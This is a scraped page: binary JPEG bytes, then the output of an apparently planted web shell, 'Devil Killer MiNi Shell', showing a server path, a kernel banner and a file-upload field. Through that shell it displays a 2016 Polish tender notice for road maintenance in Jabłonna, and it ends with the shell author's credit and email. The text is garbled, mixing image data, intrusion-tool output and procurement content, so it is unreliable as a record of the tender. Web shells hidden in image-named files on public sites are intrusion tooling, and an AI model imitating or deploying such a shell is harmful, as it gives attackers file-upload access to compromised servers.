JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160420/44291-N-2016.html

<p class="kh_header"><b>Jabłonna: bieżące utrzymanie dróg na terenie gminy Jabłonna</b><br>
<b>Numer ogłoszenia: 44291 - 2016; data zamieszczenia: 20.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy , ul. Modlińska 152, 05-110 Jabłonna, woj. mazowieckie, tel. 022 7677322, faks 022 7677324.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://ug.jablonna.ibip.pl/public/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> bieżące utrzymanie dróg na terenie gminy Jabłonna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 - Zamówienie obejmuje: 
a) równanie mechaniczne dróg gruntowych wraz z zagęszczaniem walcem samojezdnym 
b) mechaniczne wykonywanie naprawy nawierzchni dróg gruntowych tłuczniem naturalnym lub betonowym o granulacji 0-31,5 mm przy założeniu, że grubość nakładanej warstwy wynosi 10 cm wraz z niezbędnym równaniem i profilowaniem drogi oraz zagęszczaniem walcem samojezdnym,
c) mechaniczne wykonywanie naprawy nawierzchni dróg gruntowych destruktem asfaltowym przy założeniu, że grubość nakładanej warstwy wynosi 10 cm wraz z niezbędnym równaniem i profilowaniem drogi oraz zagęszczaniem walcem samojezdnym,
d) naprawa dróg gruntowych kruszywem betonowym, naturalnym 0-31,5 mm lub pospółką drogową (uzupełnienie ubytków, nierówności i itp.) wraz z niezbędnym równaniem i mechanicznym zagęszczaniem,
e) naprawa dróg gruntowych destruktem asfaltowym (uzupełnienie ubytków, nierówności i itp.) wraz z niezbędnym równaniem i mechanicznym zagęszczaniem,
f) mechaniczne wykonanie koryta na całej szerokości drogi w gruncie kat.I-IV, przy założeniu że głębokość korytowania wynosi 10cm wraz z wywozem ziemi.

Uwaga: wszystkie podane grubości warstw dotyczą grubości warstwy po wbudowaniu materiału i mechanicznym zagęszczeniu. 
W przypadku zmiany przez Zamawiającego grubości warstw (tylko w formie pisemnej) rozliczenie nastąpi proporcjonalnie do zwiększonej grubości warstwy. 
W przypadku zmniejszenia grubości warstwy przy wykonaniu robót Zamawiający pomniejszy wynagrodzenie  umowne proporcjonalnie do zmniejszonej grubości każdej warstwy. ;
Zadanie 2 - Zamówienie obejmuje wykonanie remontów cząstkowych dróg o nawierzchni    
mineralno-asfaltowej (MMA). będących w zarządzie Gminy Jabłonna.
W zakres prac wchodzić będzie:
1. Naprawa nawierzchni mineralno-asfaltowej (MMA).:
- wycinka uszkodzonych miejsc z nadaniem regularnych kształtów,
- oczyszczenie i osuszenie ubytku,
- wypełnienie betonem asfaltowy (na gorąco) o grubości 5 cm oraz  
   zagęszczenie i wyrównanie walcem drogowym. W przypadku głębokich ubytków dodatkowo uzupełnienie tłuczniem i zagęszczenie,
- zalaniu spoin emulsją asfaltową, posypaniu grysem 0-2 mm.
2. Naprawa nawierzchni mineralno-asfaltowej przy użyciu emulsji asfaltowej i grysów frakcji 2-5 mm i 5-8 mm z zastosowaniem remontera lub skrapiarki:
- wypełnienie emulsją asfaltową i grysami ubytków, spękań, rakowizn 
3. Uporządkowanie terenu prowadzonych prac..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zadanie 1 i 2 - zlecenia tożsame z zamówieniem podstawowym w ilości do 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zadanie nr 1 - 4 700.00 zł
Zadanie nr 2 - 1 300.00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek, dotyczący posiadania wiedzy i doświadczenia. Wykonawca musi wykazać, że w ciągu ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:
Zadanie 1 - co najmniej 2 roboty odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia tj. wykonał co najmniej 2 roboty polegające na mechanicznym wykonywaniu naprawy nawierzchni dróg gruntowych, o wartości min. 190 000 zł brutto każda;
Zadanie 2 - wykonał, co najmniej 2 roboty odpowiadające swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia tj. wykonał, co najmniej 2 roboty polegające na naprawie nawierzchni dróg mineralno-asfaltowej, o wartości min.   50 000 zł brutto każda - 
z podaniem ich rodzaju i wartości, dat i miejsca wykonania i odbiorców. Na potwierdzenie spełnienia warunku do oferty należy dołączyć wykaz robót oraz poświadczenia, że roboty te zostały wykonane należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Poświadczenia wykonania robót winny zawierać: nazwę zamawiającego, termin wykonania, zakres i wartość robót. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów wg formuły spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym, niezbędnym do wykonania przedmiotu zamówienia. Wykonawca musi dysponować następującym sprzętem: 
Zadanie 1 - jedna równiarka samojezdna, jeden walec samojezdny,  jedna koparko-ładowarka, dwa samochody samowyładowcze o ładowności min. 15 ton.  
Zadanie 2 - recykler do asfaltu, walec drogowy ręcznie prowadzony lub samojezdny, zagęszczarka mechaniczna, młot pneumatyczny lub mała frezarka do asfaltu, remonter lub skrapiarka. 
Na potwierdzenie spełnienia warunku do oferty należy dołączyć wykaz sprzętu.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. 
Wykonawca musi wykazać, że dysponuje jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej (lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, bądź odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych) i należącą do Okręgowej Izby Inżynierów Budownictwa.
Warunek zostanie uznany za spełniony, jeżeli wykonawca złoży oświadczenie o dysponowaniu osobami z odpowiednimi uprawnieniami. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów wg formuły spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Na potwierdzenie spełnienia warunku do oferty należy dołączyć polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od OC w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę min.: 
Zadanie 1 - 190 000 zł.  
Zadanie 2 -   50 000 zł
Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonych dokumentów wg formuły spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru oferty w poniższym zakresie  i na warunkach wskazanych w § 16 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jablonna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2016 godzina 10:00, miejsce: w siedzibie Zamawiającego pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> bieżące utrzymanie dróg gruntowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wspólny Słownik Zamówień - kod CPV: 45233220-7 - Roboty w zakresie nawierzchni dróg.
Zamówienie obejmuje: 
a) równanie mechaniczne dróg gruntowych wraz z zagęszczaniem walcem samojezdnym 
b) mechaniczne wykonywanie naprawy nawierzchni dróg gruntowych tłuczniem naturalnym lub betonowym o granulacji 0-31,5 mm przy założeniu, że grubość nakładanej warstwy wynosi 10 cm wraz z niezbędnym równaniem i profilowaniem drogi oraz zagęszczaniem walcem samojezdnym,
c) mechaniczne wykonywanie naprawy nawierzchni dróg gruntowych destruktem asfaltowym przy założeniu, że grubość nakładanej warstwy wynosi 10 cm wraz z niezbędnym równaniem i profilowaniem drogi oraz zagęszczaniem walcem samojezdnym,
d) naprawa dróg gruntowych kruszywem betonowym, naturalnym 0-31,5 mm lub pospółką drogową (uzupełnienie ubytków, nierówności i itp.) wraz z niezbędnym równaniem i mechanicznym zagęszczaniem,
e) naprawa dróg gruntowych destruktem asfaltowym (uzupełnienie ubytków, nierówności i itp.) wraz z niezbędnym równaniem i mechanicznym zagęszczaniem,
f) mechaniczne wykonanie koryta na całej szerokości drogi w gruncie kat.I-IV, przy założeniu że głębokość korytowania wynosi 10cm wraz z wywozem ziemi.

Uwaga: wszystkie podane grubości warstw dotyczą grubości warstwy po wbudowaniu materiału i mechanicznym zagęszczeniu. 
W przypadku zmiany przez Zamawiającego grubości warstw (tylko w formie pisemnej) rozliczenie nastąpi proporcjonalnie do zwiększonej grubości warstwy. 
W przypadku zmniejszenia grubości warstwy przy wykonaniu robót Zamawiający pomniejszy wynagrodzenie  umowne proporcjonalnie do zmniejszonej grubości każdej warstwy. 

Zamówienie obejmuje: 
a) równanie mechaniczne dróg gruntowych wraz z zagęszczaniem walcem samojezdnym 
b) mechaniczne wykonywanie naprawy nawierzchni dróg gruntowych tłuczniem naturalnym lub betonowym o granulacji 0-31,5 mm przy założeniu, że grubość nakładanej warstwy wynosi 10 cm wraz z niezbędnym równaniem i profilowaniem drogi oraz zagęszczaniem walcem samojezdnym,
c) mechaniczne wykonywanie naprawy nawierzchni dróg gruntowych destruktem asfaltowym przy założeniu, że grubość nakładanej warstwy wynosi 10 cm wraz z niezbędnym równaniem i profilowaniem drogi oraz zagęszczaniem walcem samojezdnym,
d) naprawa dróg gruntowych kruszywem betonowym, naturalnym 0-31,5 mm lub pospółką drogową (uzupełnienie ubytków, nierówności i itp.) wraz z niezbędnym równaniem i mechanicznym zagęszczaniem,
e) naprawa dróg gruntowych destruktem asfaltowym (uzupełnienie ubytków, nierówności i itp.) wraz z niezbędnym równaniem i mechanicznym zagęszczaniem,
f) mechaniczne wykonanie koryta na całej szerokości drogi w gruncie kat.I-IV, przy założeniu że głębokość korytowania wynosi 10cm wraz z wywozem ziemi.

Uwaga: wszystkie podane grubości warstw dotyczą grubości warstwy po wbudowaniu materiału i mechanicznym zagęszczeniu. 
W przypadku zmiany przez Zamawiającego grubości warstw (tylko w formie pisemnej) rozliczenie nastąpi proporcjonalnie do zwiększonej grubości warstwy. 
W przypadku zmniejszenia grubości warstwy przy wykonaniu robót Zamawiający pomniejszy wynagrodzenie  umowne proporcjonalnie do zmniejszonej grubości każdej warstwy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> bieżące utrzymanie dróg o nawierzchni mineralno-asfaltowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wspólny Słownik Zamówień - kod CPV: 45233142-6 Roboty w zakresie naprawy dróg.
     
Zamówienie obejmuje wykonanie remontów cząstkowych dróg o nawierzchni    
mineralno-asfaltowej (MMA). będących w zarządzie Gminy Jabłonna.
W zakres prac wchodzić będzie:
1. Naprawa nawierzchni mineralno-asfaltowej (MMA).:
- wycinka uszkodzonych miejsc z nadaniem regularnych kształtów,
- oczyszczenie i osuszenie ubytku,
- wypełnienie betonem asfaltowy (na gorąco) o grubości 5 cm oraz  
   zagęszczenie i wyrównanie walcem drogowym. W przypadku głębokich ubytków dodatkowo uzupełnienie tłuczniem i zagęszczenie,
- zalaniu spoin emulsją asfaltową, posypaniu grysem 0-2 mm.
2. Naprawa nawierzchni mineralno-asfaltowej przy użyciu emulsji asfaltowej i grysów frakcji 2-5 mm i 5-8 mm z zastosowaniem remontera lub skrapiarki:
- wypełnienie emulsją asfaltową i grysami ubytków, spękań, rakowizn 
3. Uporządkowanie terenu prowadzonych prac.

Zamówienie obejmuje wykonanie remontów cząstkowych dróg o nawierzchni    
mineralno-asfaltowej (MMA). będących w zarządzie Gminy Jabłonna.
W zakres prac wchodzić będzie:
1. Naprawa nawierzchni mineralno-asfaltowej (MMA).:
- wycinka uszkodzonych miejsc z nadaniem regularnych kształtów,
- oczyszczenie i osuszenie ubytku,
- wypełnienie betonem asfaltowy (na gorąco) o grubości 5 cm oraz  
   zagęszczenie i wyrównanie walcem drogowym. W przypadku głębokich ubytków dodatkowo uzupełnienie tłuczniem i zagęszczenie,
- zalaniu spoin emulsją asfaltową, posypaniu grysem 0-2 mm.
2. Naprawa nawierzchni mineralno-asfaltowej przy użyciu emulsji asfaltowej i grysów frakcji 2-5 mm i 5-8 mm z zastosowaniem remontera lub skrapiarki:
- wypełnienie emulsją asfaltową i grysami ubytków, spękań, rakowizn 
3. Uporządkowanie terenu prowadzonych prac..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com